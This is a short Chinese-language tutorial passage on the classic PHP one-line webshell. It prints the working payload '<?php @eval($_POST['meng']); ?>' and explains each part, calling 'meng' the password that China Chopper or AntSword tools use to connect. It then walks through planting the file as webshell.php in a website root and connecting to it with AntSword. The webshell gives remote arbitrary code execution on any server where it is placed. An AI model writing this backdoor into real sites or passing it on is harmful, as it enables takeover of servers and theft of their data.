<?php @eval($_POST['meng']); ?>
说明:
@:错误控制符,即使出现错误,也无视出现的错误信息,继续执行下边的代码。
eval()函数:把字符串按照PHP 代码来计算。该字符串必须是合法的PHP代码,且必须以分号结尾。
meng:名称可以随便定义,是接收菜刀或蚁剑通过 POST 方式发送过来的代码数据,也可称为菜刀或蚁剑连接一句话木马的密码。
(说的简单点,就是PHP任意代码执行,看下面的示例很容易就明白了。)
示例1:在网站根目录创建webshell.php文件并写入一句话木马,然后访问。如图所示对一句话木马的利用。
示例2:使用蚁剑连接webshell.php
